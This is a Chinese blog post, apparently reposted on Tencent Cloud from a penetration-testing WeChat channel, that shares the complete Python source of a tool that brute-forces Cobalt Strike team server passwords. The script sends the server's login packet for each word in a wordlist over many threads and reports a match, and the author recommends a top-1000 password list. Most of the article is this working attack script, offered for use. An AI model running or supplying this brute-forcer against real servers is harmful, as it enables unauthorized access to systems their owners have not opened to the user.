前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >爆破cobalt strike密码脚本

爆破cobalt strike密码脚本

作者头像
天钧
发布2020-09-30 10:40:45
2.1K0
发布2020-09-30 10:40:45
举报
文章被收录于专栏:渗透云笔记渗透云笔记

你 · 的

渗透必备工具

工具清单

无聊的我又来水文了,今天的是爆破cobalt strike密码脚本,最近活脱脱成了一个GITHUB的安(搬)利(运)管(工)。其余时间都是在写作业

和整理自己的知识体系,学的太杂了,别忘了点赞哦!。

你也可以来昨天发的那个QQ群一起探讨下“渗透测试中的信息收集方式有哪些,欢迎来做作业”后台回复【QQ群】获取群号。

GITHUB地址;https://github.com/ryanohoro/csbruter

最近的文章总是这么朴实无华,且枯燥,工具的源码如下,字典文件可以用passwdtop1000

代码语言:javascript
复制
#!/usr/bin/env python3

import time
import socket
import ssl
import argparse
import concurrent.futures
import sys

# csbrute.py - Cobalt Strike Team Server Password Brute Forcer

# https://stackoverflow.com/questions/6224736/how-to-write-python-code-that-is-able-to-properly-require-a-minimal-python-versi

MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)

parser = argparse.ArgumentParser()

parser.add_argument("host",
                    help="Teamserver address")
parser.add_argument("wordlist", nargs="?",
                    help="Newline-delimited word list file")
parser.add_argument("-p", dest="port", default=50050, type=int,
                    help="Teamserver port")
parser.add_argument("-t", dest="threads", default=25, type=int,
                    help="Concurrency level")

args = parser.parse_args()

# https://stackoverflow.com/questions/27679890/how-to-handle-ssl-connections-in-raw-python-socket


class NotConnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node


class DisconnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node


class Connector:
    def __init__(self):
        self.sock = None
        self.ssl_sock = None
        self.ctx = ssl.SSLContext()
        self.ctx.verify_mode = ssl.CERT_NONE
        pass

    def is_connected(self):
        return self.sock and self.ssl_sock

    def open(self, hostname, port):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(10)
        self.ssl_sock = self.ctx.wrap_socket(self.sock)

        if hostname == socket.gethostname():
            ipaddress = socket.gethostbyname_ex(hostname)[2][0]
            self.ssl_sock.connect((ipaddress, port))
        else:
            self.ssl_sock.connect((hostname, port))

    def close(self):
        if self.sock:
            self.sock.close()
        self.sock = None
        self.ssl_sock = None

    def send(self, buffer):
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        self.ssl_sock.sendall(buffer)

    def receive(self):
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        received_size = 0
        data_buffer = b""

        while received_size < 4:
            data_in = self.ssl_sock.recv()
            data_buffer = data_buffer + data_in
            received_size += len(data_in)

        return data_buffer


def passwordcheck(password):
    if len(password) > 0:
        result = None
        conn = Connector()
        conn.open(args.host, args.port)
        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(
            bytes(password, "ascii").ljust(256, b"A"))
        conn.send(payload)
        if conn.is_connected(): result = conn.receive()
        if conn.is_connected(): conn.close()
        if result == bytearray(b"\x00\x00\xca\xfe"):
            return password
        else:
            return False
    else:
        print("Ignored blank password")

passwords = []

if args.wordlist:
    print("Wordlist: {}".format(args.wordlist))
    passwords = open(args.wordlist).read().split("\n")
else:
    print("Wordlist: {}".format("stdin"))
    for line in sys.stdin:
        passwords.append(line.rstrip())

if len(passwords) > 0:

    print("Word Count: {}".format(len(passwords)))
    print("Threads: {}".format(args.threads))

    start = time.time()

    # https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python

    attempts = 0
    failures = 0

    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:

        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
        for future in concurrent.futures.as_completed(future_to_check):
            password = future_to_check[future]
            try:
                data = future.result()
                attempts = attempts + 1
                if data:
                    print("Found Password: {}".format(password))
            except Exception as exc:
                failures = failures + 1
                print('%r generated an exception: %s' % (password, exc))

    print("Attempts: {}".format(attempts))
    print("Failures: {}".format(failures))
    finish = time.time()
    print("Seconds: {:.1f}".format(finish - start))
    print("Attemps per second: {:.1f}".format((failures + attempts) / (finish - start)))
else:
    print("Password(s) required")
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-09-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档